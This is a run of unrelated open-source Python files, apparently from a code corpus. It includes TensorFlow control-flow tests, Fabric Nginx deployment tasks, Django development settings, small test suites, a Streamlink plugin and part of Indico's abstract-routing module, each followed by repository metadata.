parallel_iterations=steps,
swap_memory=True)
r = math_ops.reduce_sum(x)
dx, dk = gradients_impl.gradients(r, [x, kernel])
# Use group to avoid fetching back results.
r = control_flow_ops.group(dx, dk)
for _ in xrange(3):
# exclude warm up time
sess.run(r)
start_time = time.time()
for _ in xrange(num_iters):
sess.run(r)
return (time.time() - start_time) / num_iters
def benchmarkWhileOpCrossDevicePlacement(self):
iters = 10
# Run loop body on GPU, but other ops on CPU.
duration = self._runOneBenchmark("cpu", iters, static_unroll=False)
self.report_benchmark(
name="while_op_cross_device", iters=iters, wall_time=duration)
def benchmarkWhileOpSameDevicePlacement(self):
iters = 10
# Run all ops on the same GPU device.
duration = self._runOneBenchmark("gpu", iters, static_unroll=False)
self.report_benchmark(
name="while_op_same_device", iters=iters, wall_time=duration)
def benchmarkWhileOpUnrollCrossDevicePlacement(self):
iters = 10
# Run loop body on GPU, but other ops on CPU.
duration = self._runOneBenchmark("cpu", iters, static_unroll=True)
self.report_benchmark(
name="unroll_cross_device_cpu", iters=iters, wall_time=duration)
def benchmarkWhileOpUnrollSameDevicePlacement(self):
iters = 10
# Run all ops on GPU.
duration = self._runOneBenchmark("gpu", iters, static_unroll=True)
self.report_benchmark(
name="unroll_same_device", iters=iters, wall_time=duration)
@test_util.with_control_flow_v2
class EagerTest(test.TestCase):
def testCond(self):
with context.eager_mode():
pred = math_ops.less(1, 2)
fn1 = lambda: [constant_op.constant(10)]
fn2 = lambda: [constant_op.constant(20)]
r = control_flow_ops.cond(pred, fn1, fn2)
self.assertAllEqual(r.numpy(), 10)
self.assertFalse(isinstance(r, list))
def testWhileLoop(self):
with context.eager_mode():
tensor = constant_op.constant([1, 2, 3, 4, 5])
self.assertAllEqual(isum(tensor).numpy(), [46, 47, 48, 49, 50])
def testWhileLoopWithMaxIterations(self):
with context.eager_mode():
tensor = constant_op.constant([1, 2, 3, 4, 5])
self.assertAllEqual(
isum(tensor, maximum_iterations=3).numpy(),
[1 + 3, 2 + 3, 3 + 3, 4 + 3, 5 + 3])
def testWhileWithMaximumIterationsAndSingleArgument(self):
with context.eager_mode():
tensor = constant_op.constant(0)
r = control_flow_ops.while_loop(
lambda i: i < 3, lambda i: i + 1, [tensor], maximum_iterations=1)
self.assertEqual(1, r.numpy())
def testWithDependencies(self):
with context.eager_mode():
t1 = constant_op.constant(1)
t2 = constant_op.constant(2)
t3 = control_flow_ops.with_dependencies(t1, t2)
self.assertAllEqual(t2.numpy(), t3.numpy())
def testTuple(self):
with context.eager_mode():
t1 = constant_op.constant(1)
t2 = constant_op.constant(2)
tup1, tup2 = control_flow_ops.tuple([t1, t2])
self.assertAllEqual(t1.numpy(), tup1.numpy())
self.assertAllEqual(t2.numpy(), tup2.numpy())
def testCase(self):
with context.eager_mode():
x = constant_op.constant(1)
y = constant_op.constant(2)
z = constant_op.constant(3)
f1 = lambda: constant_op.constant(17)
f2 = lambda: constant_op.constant(23)
f3 = lambda: constant_op.constant(-1)
r1 = control_flow_ops.case(
[(x < y, f1), (x > z, f2)], default=f3, exclusive=True)
self.assertAllEqual(r1.numpy(), 17)
if __name__ == "__main__":
test.main()
| {
"content_hash": "f08cd81bf4c6308361b366852e82fa09",
"timestamp": "",
"source": "github",
"line_count": 3450,
"max_line_length": 112,
"avg_line_length": 36.526376811594204,
"alnum_prop": 0.6117715210766886,
"repo_name": "kobejean/tensorflow",
"id": "d91a848e01350a92894811739257d529aad636ab",
"size": "126739",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tensorflow/python/kernel_tests/control_flow_ops_py_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "2867"
},
{
"name": "Batchfile",
"bytes": "9258"
},
{
"name": "C",
"bytes": "341894"
},
{
"name": "C#",
"bytes": "8446"
},
{
"name": "C++",
"bytes": "49273038"
},
{
"name": "CMake",
"bytes": "195712"
},
{
"name": "Dockerfile",
"bytes": "36400"
},
{
"name": "Go",
"bytes": "1253646"
},
{
"name": "HTML",
"bytes": "4680032"
},
{
"name": "Java",
"bytes": "836009"
},
{
"name": "Jupyter Notebook",
"bytes": "2604741"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "Makefile",
"bytes": "52734"
},
{
"name": "Objective-C",
"bytes": "15650"
},
{
"name": "Objective-C++",
"bytes": "99243"
},
{
"name": "PHP",
"bytes": "1357"
},
{
"name": "Perl",
"bytes": "7536"
},
{
"name": "PureBasic",
"bytes": "25356"
},
{
"name": "Python",
"bytes": "41122917"
},
{
"name": "Ruby",
"bytes": "553"
},
{
"name": "Shell",
"bytes": "466896"
},
{
"name": "Smarty",
"bytes": "6976"
}
],
"symlink_target": ""
} |
from argyle.base import upload_template
from argyle.system import restart_service
from fabric.api import abort, sudo, task
from fabric.contrib import files
@task
def remove_default_site():
"""Remove the default Nginx site if it exists."""
disable_site('default')
@task
def upload_nginx_site_conf(site_name, template_name=None, context=None, enable=True):
"""Upload Nginx site configuration from a template."""
template_name = template_name or [u'nginx/%s.conf' % site_name, u'nginx/site.conf']
site_available = u'/etc/nginx/sites-available/%s' % site_name
upload_template(template_name, site_available, context=context, use_sudo=True)
if enable:
enable_site(site_name)
@task
def enable_site(site_name):
"""Enable an available Nginx site."""
site_available = u'/etc/nginx/sites-available/%s' % site_name
site_enabled = u'/etc/nginx/sites-enabled/%s' % site_name
if files.exists(site_available):
sudo(u'ln -s -f %s %s' % (site_available, site_enabled))
restart_service(u'nginx')
else:
abort(u'%s site configuration is not available' % site_name)
@task
def disable_site(site_name):
"""Disables Nginx site configuration."""
site = u'/etc/nginx/sites-enabled/%s' % site_name
if files.exists(site):
sudo(u'rm %s' % site)
restart_service(u'nginx')
| {
"content_hash": "f5ec7f9abe4a479f3e5d55fcc763f270",
"timestamp": "",
"source": "github",
"line_count": 45,
"max_line_length": 87,
"avg_line_length": 30.333333333333332,
"alnum_prop": 0.673992673992674,
"repo_name": "mlavin/argyle",
"id": "dadeb52198b6c986a4b595b6382c1f4e84bb5914",
"size": "1365",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "argyle/nginx.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "71211"
},
{
"name": "Ruby",
"bytes": "248"
},
{
"name": "Shell",
"bytes": "5096"
}
],
"symlink_target": ""
} |
"""
Django settings for DjangoQuickTour project.
Generated by 'django-admin startproject' using Django 1.10.4.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'bn@(8@nb2@jn6tck7d(cz3b3@95e1-q_#-p0pws&9)5))8ip5)'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'bootstrap_admin',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'blog',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'DjangoQuickTour.urls'
from django.conf import global_settings
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
# insert your TEMPLATE_DIRS here
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
# Insert your TEMPLATE_CONTEXT_PROCESSORS here or use this
# list if you haven't customized them:
'django.contrib.auth.context_processors.auth',
'django.template.context_processors.debug',
'django.template.context_processors.i18n',
'django.template.context_processors.media',
'django.template.context_processors.static',
'django.template.context_processors.tz',
'django.contrib.messages.context_processors.messages',
'django.template.context_processors.request'
]
},
},
]
BOOTSTRAP_ADMIN_SIDEBAR_MENU = True
WSGI_APPLICATION = 'DjangoQuickTour.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'zh-Hans'
TIME_ZONE = 'Asia/Shanghai'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
| {
"content_hash": "eb910c2eb329618655cd9e6d9c9fdfe3",
"timestamp": "",
"source": "github",
"line_count": 133,
"max_line_length": 91,
"avg_line_length": 27.56390977443609,
"alnum_prop": 0.6783960720130933,
"repo_name": "mingyeh/DjangoQuickTour",
"id": "79452e7dd21ddf621f9148e46f1468a09de9f939",
"size": "3666",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "DjangoQuickTour/DjangoQuickTour/settings.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "2502"
},
{
"name": "HTML",
"bytes": "3775"
},
{
"name": "Python",
"bytes": "14670"
}
],
"symlink_target": ""
} |
"""
__init__
Test Suite
:copyright: (c) 2013 by Openlabs Technologies & Consulting (P) Limited
:license: BSD, see LICENSE for more details.
"""
import unittest
import trytond.tests.test_tryton
from test_category import TestCategory
def suite():
"""
Define suite
"""
test_suite = trytond.tests.test_tryton.suite()
test_suite.addTests([
unittest.TestLoader().loadTestsFromTestCase(TestCategory),
])
return test_suite
if __name__ == '__main__':
unittest.TextTestRunner(verbosity=2).run(suite())
| {
"content_hash": "af78da18035e96920ad3a342316cc7bf",
"timestamp": "",
"source": "github",
"line_count": 27,
"max_line_length": 74,
"avg_line_length": 20.555555555555557,
"alnum_prop": 0.6576576576576577,
"repo_name": "openlabs/nereid-catalog-icecat",
"id": "c66e5c3a63f9c11a1a2e1b4a993d32643dd2a234",
"size": "579",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/__init__.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "12326"
}
],
"symlink_target": ""
} |
import io
import unittest
from unittest.mock import patch
from kattis import k_methodicmultiplication
###############################################################################
class SampleInput(unittest.TestCase):
'''Problem statement sample inputs and outputs'''
def test_sample_input_1(self):
'''Run and assert problem statement sample input 1 and output.'''
inputs = []
inputs.append('S(S(0))')
inputs.append('S(S(S(0)))')
inputs = '\n'.join(inputs) + '\n'
outputs = 'S(S(S(S(S(S(0))))))\n'
with patch('sys.stdin', io.StringIO(inputs)) as stdin,\
patch('sys.stdout', new_callable=io.StringIO) as stdout:
k_methodicmultiplication.main()
self.assertEqual(stdout.getvalue(), outputs)
self.assertEqual(stdin.read(), '')
def test_sample_input_2(self):
'''Run and assert problem statement sample input 2 and output.'''
inputs = []
inputs.append('S(S(S(S(S(0)))))')
inputs.append('0')
inputs = '\n'.join(inputs) + '\n'
outputs = '0\n'
with patch('sys.stdin', io.StringIO(inputs)) as stdin,\
patch('sys.stdout', new_callable=io.StringIO) as stdout:
k_methodicmultiplication.main()
self.assertEqual(stdout.getvalue(), outputs)
self.assertEqual(stdin.read(), '')
###############################################################################
if __name__ == '__main__':
unittest.main()
| {
"content_hash": "96f090c17ae4d7ca7b41f92b05d11be4",
"timestamp": "",
"source": "github",
"line_count": 44,
"max_line_length": 79,
"avg_line_length": 34.56818181818182,
"alnum_prop": 0.52465483234714,
"repo_name": "ivanlyon/exercises",
"id": "a6dff839abcf745e7a69dc03d4fad8be9f43560e",
"size": "1521",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/test_k_methodicmultiplication.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "1283"
},
{
"name": "HTML",
"bytes": "9068"
},
{
"name": "Python",
"bytes": "96419"
}
],
"symlink_target": ""
} |
"""Engine related exceptions."""
class EngineManagerError(Exception):
"""Any exception related to engine manager."""
pass
| {
"content_hash": "cbe64be2fe163e378097d59835df47e9",
"timestamp": "",
"source": "github",
"line_count": 6,
"max_line_length": 50,
"avg_line_length": 22,
"alnum_prop": 0.7045454545454546,
"repo_name": "simphony/simphony-common",
"id": "feb19fa5e7952dcec10242dcbbbc9e6b92d5f13f",
"size": "132",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "simphony/engine/exceptions.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Batchfile",
"bytes": "663"
},
{
"name": "Python",
"bytes": "543455"
}
],
"symlink_target": ""
} |
import uuid
from django.db import connections
from django.db.models import Model, UUIDField
def _compiler_for_queryset(qs, which='SQLCompiler'):
connection = connections[qs.db]
Compiler = connection.ops.compiler(which)
return Compiler(qs.query, connection, connection.alias)
class RqlQueryProxy(object):
"""
The goal of this proxy to deliver connection instance to run() method.
"""
def __init__(self, query, connection):
self.query = query
self.connection = connection
def __call__(self, *args, **kwargs):
return RqlQueryProxy(self.query(*args, **kwargs), self.connection)
def __getattr__(self, name):
if name == "run":
def runner(*args, **kwargs):
return self.query.run(self.connection, *args, **kwargs)
return runner
else:
return RqlQueryProxy(getattr(self.query, name), self.connection)
class RethinkDBModel(Model):
class Meta:
abstract = True
id = UUIDField(primary_key=True, default=uuid.uuid4)
@classmethod
def r(cls):
compiler = _compiler_for_queryset(cls.objects.get_queryset())
return RqlQueryProxy(compiler.get_table(), compiler.connection)
| {
"content_hash": "b550a069a3cc3d5d72fd244a97cbac5a",
"timestamp": "",
"source": "github",
"line_count": 46,
"max_line_length": 72,
"avg_line_length": 25.02173913043478,
"alnum_prop": 0.6959165942658557,
"repo_name": "d2rk/django-rethinkdb-engine",
"id": "7efdf19fb15a0935f39edbd9fd289931b79a5b2a",
"size": "1151",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "django_rethinkdb_engine/models.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Makefile",
"bytes": "726"
},
{
"name": "Python",
"bytes": "16400"
}
],
"symlink_target": ""
} |
import logging
import re
from urllib.parse import urljoin
from streamlink.plugin import Plugin
from streamlink.plugin.api import validate
from streamlink.stream import HLSStream, HTTPStream
from streamlink.utils import parse_json, verifyjson
log = logging.getLogger(__name__)
class ard_live(Plugin):
_url_re = re.compile(r"https?://((www|live)\.)?daserste\.de/")
_player_re = re.compile(r'''data-ctrl-player\s*=\s*"(?P<jsondata>.*?)"''')
_player_url_schema = validate.Schema(
validate.transform(_player_re.search),
validate.any(None, validate.all(
validate.get("jsondata"),
validate.text,
validate.transform(lambda v: parse_json(v.replace("'", '"'))),
validate.transform(lambda v: verifyjson(v, "url")),
))
)
_mediainfo_schema = validate.Schema({
"mc": {
validate.optional("_title"): validate.text,
validate.optional("_isLive"): bool,
validate.optional("_geoblocked"): bool,
"_mediaArray": [{
"_mediaStreamArray": [{
"_quality": validate.any(validate.text, int),
"_stream": validate.any(validate.text, [validate.text]),
}]
}],
},
}, validate.get("mc"))
_QUALITY_MAP = {
"auto": "auto",
4: "1080p",
3: "720p",
2: "544p",
1: "288p",
0: "144p"
}
@classmethod
def can_handle_url(cls, url):
return cls._url_re.match(url) is not None
def _get_streams(self):
res = self.session.http.get(self.url)
data_url = self._player_url_schema.validate(res.text)
if not data_url:
log.error("Could not find video at this url.")
return
data_url = urljoin(res.url, data_url)
log.debug(f"Player URL: '{data_url}'")
res = self.session.http.get(data_url)
mediainfo = parse_json(res.text, name="MEDIAINFO", schema=self._mediainfo_schema)
log.trace("Mediainfo: {0!r}".format(mediainfo))
for media in mediainfo["_mediaArray"]:
for stream in media["_mediaStreamArray"]:
stream_ = stream["_stream"]
if isinstance(stream_, list):
if not stream_:
continue
stream_ = stream_[0]
if ".m3u8" in stream_:
yield from HLSStream.parse_variant_playlist(self.session, stream_).items()
elif ".mp4" in stream_ and ".f4m" not in stream_:
yield "{0}".format(self._QUALITY_MAP[stream["_quality"]]), HTTPStream(self.session, stream_)
else:
if ".f4m" not in stream_:
log.error("Unexpected stream type: '{0}'".format(stream_))
__plugin__ = ard_live
| {
"content_hash": "39b299e3c75faa98e287f64e77979476",
"timestamp": "",
"source": "github",
"line_count": 81,
"max_line_length": 112,
"avg_line_length": 35.382716049382715,
"alnum_prop": 0.5436147941381717,
"repo_name": "beardypig/streamlink",
"id": "f1ec0b7e2c5bcc0815343d2c83f04086091c1956",
"size": "2866",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/streamlink/plugins/ard_live.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Batchfile",
"bytes": "838"
},
{
"name": "Python",
"bytes": "1538432"
},
{
"name": "Shell",
"bytes": "18707"
}
],
"symlink_target": ""
} |
from functools import partial
from flask import current_app, g
from indico.modules.events.abstracts.compat import compat_abstract
from indico.modules.events.abstracts.controllers import (abstract, abstract_list, boa, display, email_templates,
management, reviewing)
from indico.web.flask.util import make_compat_redirect_func
from indico.web.flask.wrappers import IndicoBlueprint
_bp = IndicoBlueprint('abstracts', __name__, url_prefix='/event/<int:event_id>', template_folder='templates',
virtual_template_folder='events/abstracts')
# Display pages (not related to any specific abstract)
_bp.add_url_rule('/abstracts/', 'call_for_abstracts', display.RHCallForAbstracts)
_bp.add_url_rule('/abstracts/mine.pdf', 'my_abstracts_pdf', display.RHMyAbstractsExportPDF)
_bp.add_url_rule('/abstracts/submit', 'submit', display.RHSubmitAbstract, methods=('GET', 'POST'))
_bp.add_url_rule('/abstracts/submit/<uuid>', 'submit_invited_abstract', display.RHSubmitInvitedAbstract,
methods=('GET', 'POST'))
# Reviewing pages (display area, not related to any specific abstract)
_bp.add_url_rule('/abstracts/reviewing/', 'display_reviewable_tracks', reviewing.RHDisplayReviewableTracks)
_bp.add_url_rule('/abstracts/reviewing/<int:track_id>/', 'display_reviewable_track_abstracts',
reviewing.RHDisplayReviewableTrackAbstracts)
_bp.add_url_rule('/abstracts/reviewing/<int:track_id>/customize', 'display_customize_abstract_list',
reviewing.RHDisplayAbstractListCustomize, methods=('GET', 'POST'))
_bp.add_url_rule('/abstracts/reviewing/<int:track_id>/attachments', 'display_download_attachments',
reviewing.RHDisplayAbstractsDownloadAttachments, methods=('POST',))
_bp.add_url_rule('/abstracts/reviewing/<int:track_id>/abstracts.pdf', 'display_abstracts_pdf_export',
reviewing.RHDisplayAbstractsExportPDF, methods=('POST',))
_bp.add_url_rule('/abstracts/reviewing/<int:track_id>/abstracts.csv', 'display_abstracts_csv_export',
reviewing.RHDisplayAbstractsExportCSV, methods=('POST',))
_bp.add_url_rule('/abstracts/reviewing/<int:track_id>/abstracts.xlsx', 'display_abstracts_xlsx_export',
reviewing.RHDisplayAbstractsExportExcel, methods=('POST',))
# Book of Abstracts
_bp.add_url_rule('/manage/abstracts/boa/settings', 'manage_boa_settings', boa.RHBOASettings, methods=('GET', 'POST'))
_bp.add_url_rule('/manage/abstracts/boa/custom/upload', 'upload_boa_file', boa.RHUploadBOAFile, methods=('POST',))
_bp.add_url_rule('/manage/abstracts/boa/custom', 'manage_custom_boa', boa.RHCustomBOA, methods=('POST', 'DELETE'))
_bp.add_url_rule('/book-of-abstracts.pdf', 'export_boa', boa.RHExportBOA)
_bp.add_url_rule('/manage/book-of-abstracts.zip', 'export_boa_tex', boa.RHExportBOATeX)
# Misc
_bp.add_url_rule('/abstracts/other-list', 'other_abstracts', reviewing.RHListOtherAbstracts, methods=('POST',))
# Management dashboard
_bp.add_url_rule('/manage/abstracts/', 'management', management.RHAbstractsDashboard)
# CFA scheduling
_bp.add_url_rule('/manage/abstracts/schedule', 'schedule_abstracts_call', management.RHScheduleCFA,
methods=('GET', 'POST'))
_bp.add_url_rule('/manage/abstracts/open', 'open_abstracts_call', management.RHOpenCFA, methods=('POST',))
_bp.add_url_rule('/manage/abstracts/close', 'close_abstracts_call', management.RHCloseCFA, methods=('POST',))
# Configuration
_bp.add_url_rule('/manage/abstracts/settings', 'manage_submission_settings', management.RHManageAbstractSubmission,
methods=('GET', 'POST'))
_bp.add_url_rule('/manage/abstracts/review-settings', 'manage_reviewing_settings', management.RHManageAbstractReviewing,
methods=('GET', 'POST'))
_bp.add_url_rule('/manage/abstracts/questions', 'manage_reviewing_questions',
management.RHManageAbstractReviewingQuestions, methods=('GET', 'POST'))
_bp.add_url_rule('/manage/abstracts/questions/sort', 'sort_reviewing_questions',
management.RHSortReviewingQuestions, methods=('POST',))
_bp.add_url_rule('/manage/abstracts/questions/create', 'create_reviewing_question',
management.RHCreateAbstractReviewingQuestion, methods=('GET', 'POST'))
_bp.add_url_rule('/manage/abstracts/questions/<int:question_id>/edit', 'edit_reviewing_question',
management.RHEditAbstractReviewingQuestion, methods=('POST', 'GET'))
_bp.add_url_rule('/manage/abstracts/questions/<int:question_id>', 'delete_reviewing_question',
management.RHDeleteAbstractReviewingQuestion, methods=('DELETE',))
_bp.add_url_rule('/manage/abstracts/teams', 'manage_reviewing_roles', management.RHManageReviewingRoles,
methods=('GET', 'POST'))
# Abstract list (management)
_bp.add_url_rule('/manage/abstracts/list/', 'manage_abstract_list', abstract_list.RHAbstractList)
_bp.add_url_rule('/manage/abstracts/list/customize', 'customize_abstract_list', abstract_list.RHAbstractListCustomize,
methods=('GET', 'POST'))
_bp.add_url_rule('/manage/abstracts/list/static-url', 'generate_static_url', abstract_list.RHAbstractListStaticURL,
methods=('POST',))
_bp.add_url_rule('/manage/abstracts/abstracts.pdf', 'abstracts_pdf_export', abstract_list.RHAbstractsExportPDF,
methods=('GET', 'POST'))
_bp.add_url_rule('/manage/abstracts/abstracts.csv', 'abstracts_csv_export', abstract_list.RHAbstractsExportCSV,
methods=('GET', 'POST'))
_bp.add_url_rule('/manage/abstracts/abstracts.xlsx', 'abstracts_xlsx_export', abstract_list.RHAbstractsExportExcel,
methods=('GET', 'POST'))
_bp.add_url_rule('/manage/abstracts/abstracts.json', 'abstracts_json_export', abstract_list.RHAbstractsExportJSON,
methods=('GET', 'POST'))
_bp.add_url_rule('/manage/abstracts/create', 'manage_create_abstract', abstract_list.RHCreateAbstract,
methods=('GET', 'POST'))
# Bulk abstract actions (management)
_bp.add_url_rule('/manage/abstracts/delete', 'manage_delete_abstracts', abstract_list.RHDeleteAbstracts,
methods=('POST',))
_bp.add_url_rule('/manage/abstracts/person-list', 'person_list', abstract_list.RHAbstractPersonList, methods=('POST',))
_bp.add_url_rule('/manage/abstracts/attachments', 'download_attachments', abstract_list.RHAbstractsDownloadAttachments,
methods=('GET', 'POST'))
_bp.add_url_rule('/manage/abstracts/judge', 'manage_judge_abstracts', abstract_list.RHBulkAbstractJudgment,
methods=('POST',))
# E-mail templates
_bp.add_url_rule('/manage/abstracts/email-templates/', 'email_tpl_list', email_templates.RHEmailTemplateList)
_bp.add_url_rule('/manage/abstracts/email-templates/add',
'email_tpl_add', email_templates.RHAddEmailTemplate, methods=('GET', 'POST'))
_bp.add_url_rule('/manage/abstracts/email-templates/sort',
'email_tpl_sort', email_templates.RHSortEmailTemplates, methods=('POST',))
_bp.add_url_rule('/manage/abstracts/email-templates/<email_tpl_id>',
'email_tpl_delete', email_templates.RHDeleteEmailTemplate, methods=('DELETE',))
_bp.add_url_rule('/manage/abstracts/email-templates/<email_tpl_id>/edit',
'email_tpl_rule_edit', email_templates.RHEditEmailTemplateRules, methods=('GET', 'POST'))
_bp.add_url_rule('/manage/abstracts/email-templates/<email_tpl_id>/edit-text',
'email_tpl_text_edit', email_templates.RHEditEmailTemplateText, methods=('GET', 'POST'))
_bp.add_url_rule('/manage/abstracts/email-templates/<email_tpl_id>',
'email_tpl_rest', email_templates.RHEmailTemplateREST, methods=('PATCH',))
# URLs available in both management and display areas
# Note: When adding a new one here make sure to specify `defaults=defaults`
# for each rule. Otherwise you may not get the correct one.
for prefix, is_management in (('/manage/abstracts', True), ('/abstracts', False)):
defaults = {'management': is_management}
# Abstract display
_bp.add_url_rule(prefix + '/<int:abstract_id>/', 'display_abstract', abstract.RHDisplayAbstract, defaults=defaults)
_bp.add_url_rule(prefix + '/<int:abstract_id>/attachments/<file_id>/<filename>', 'download_attachment',
abstract.RHAbstractsDownloadAttachment, defaults=defaults)
_bp.add_url_rule(prefix + '/<int:abstract_id>/abstract-reviews.pdf', 'manage_abstract_pdf_export',
abstract.RHAbstractExportFullPDF, defaults=defaults)
_bp.add_url_rule(prefix + '/<int:abstract_id>/abstract.pdf', 'display_abstract_pdf_export',
abstract.RHAbstractExportPDF, defaults=defaults)
_bp.add_url_rule(prefix + '/<int:abstract_id>/notifications', 'notification_log',
abstract.RHAbstractNotificationLog, defaults=defaults)
# Abstract actions
_bp.add_url_rule(prefix + '/<int:abstract_id>/edit', 'edit_abstract',
abstract.RHEditAbstract, methods=('GET', 'POST'), defaults=defaults)
# Reviewing/judgment actions
_bp.add_url_rule(prefix + '/<int:abstract_id>/withdraw', 'withdraw_abstract',
reviewing.RHWithdrawAbstract, methods=('POST',), defaults=defaults)
_bp.add_url_rule(prefix + '/<int:abstract_id>/reset', 'reset_abstract_state',
reviewing.RHResetAbstractState, methods=('POST',), defaults=defaults)
_bp.add_url_rule(prefix + '/<int:abstract_id>/judge', 'judge_abstract',
reviewing.RHJudgeAbstract, methods=('POST',), defaults=defaults)
_bp.add_url_rule(prefix + '/<int:abstract_id>/reviewing-tracks', 'edit_review_tracks',
reviewing.RHEditReviewedForTrackList, methods=('GET', 'POST'), defaults=defaults)
_bp.add_url_rule(prefix + '/<int:abstract_id>/review/track/<int:track_id>', 'review_abstract',
reviewing.RHSubmitAbstractReview, methods=('GET', 'POST'), defaults=defaults)
_bp.add_url_rule(prefix + '/<int:abstract_id>/reviews/<int:review_id>/edit', 'edit_review',
reviewing.RHEditAbstractReview, methods=('GET', 'POST'), defaults=defaults)
# Abstract comments
_bp.add_url_rule(prefix + '/<int:abstract_id>/comment', 'comment_abstract',
reviewing.RHSubmitAbstractComment, methods=('POST',), defaults=defaults)
_bp.add_url_rule(prefix + '/<int:abstract_id>/comments/<int:comment_id>', 'edit_abstract_comment',
reviewing.RHEditAbstractComment, methods=('GET', 'POST'), defaults=defaults)
_bp.add_url_rule(prefix + '/<int:abstract_id>/comments/<int:comment_id>', 'delete_abstract_comment',
reviewing.RHDeleteAbstractComment, methods=('DELETE',), defaults=defaults)
@_bp.url_defaults
def _add_management_flag(endpoint, values):
if ('management' not in values and
endpoint.split('.')[0] == _bp.name and
current_app.url_map.is_endpoint_expecting(endpoint, 'management')):
values['management'] = g.rh.management
# Legacy URLs - display
_compat_bp = IndicoBlueprint('compat_abstracts', __name__, url_prefix='/event/<int:event_id>')
_compat_bp.add_url_rule('/call-for-abstracts/', 'cfa', make_compat_redirect_func(_bp, 'call_for_abstracts'))
_compat_bp.add_url_rule('/call-for-abstracts/my-abstracts', 'mine',
make_compat_redirect_func(_bp, 'call_for_abstracts'))
_compat_bp.add_url_rule('/call-for-abstracts/my-abstracts.pdf', 'mine_pdf',
make_compat_redirect_func(_bp, 'my_abstracts_pdf'))
_compat_bp.add_url_rule('/call-for-abstracts/submit', 'submit', make_compat_redirect_func(_bp, 'call_for_abstracts'))
_compat_bp.add_url_rule('/call-for-abstracts/<int:friendly_id>/', 'abstract',
partial(compat_abstract, 'display_abstract'))
_compat_bp.add_url_rule('/call-for-abstracts/<int:friendly_id>/Abstract.pdf', 'abstract_pdf',
partial(compat_abstract, 'display_abstract_pdf_export'))
_compat_bp.add_url_rule('/abstract-book.pdf', 'boa', make_compat_redirect_func(_bp, 'export_boa'))
# Legacy URLs - management
_compat_bp.add_url_rule('/manage/call-for-abstracts/abstracts/', 'manage_cfa',
make_compat_redirect_func(_bp, 'manage_abstract_list'))
_compat_bp.add_url_rule('/manage/call-for-abstracts/abstracts/<int:friendly_id>/', 'manage_abstract',
partial(compat_abstract, 'display_abstract', management=True))
_compat_bp.add_url_rule('/manage/call-for-abstracts/abstracts/<int:friendly_id>/abstract.pdf',
'manage_abstract_pdf_export', partial(compat_abstract, 'manage_abstract_pdf_export',
management=True))
# Legacy URLs - reviewing
_compat_bp.add_url_rule('/manage/program/tracks/<int:track_id>/abstracts/',
'track_abstracts', make_compat_redirect_func(_bp, 'display_reviewable_tracks',
view_args_conv={'track_id': None}))
_compat_bp.add_url_rule('/manage/program/tracks/<int:track_id>/abstracts/<int:friendly_id>/', 'track_abstract',
partial(compat_abstract, 'display_abstract'))
_compat_bp.add_url_rule('/manage/program/tracks/<int:track_id>/abstracts/<int:friendly_id>/abstract.pdf',
'track_abstract_pdf', partial(compat_abstract, 'display_abstract_pdf_export'))
| {
"content_hash": "97ae3fdf99823a437ec2a83a948fec7f",
"timestamp": "",
"source": "github",
"line_count": 194,
"max_line_length": 120,
"avg_line_length": 69.78865979381443,
"alnum_prop": 0.6773026072826649,
"repo_name": "indico/indico",
"id": "d7f2fcf39b04c37594608a00dba091f8b2b28d7e",
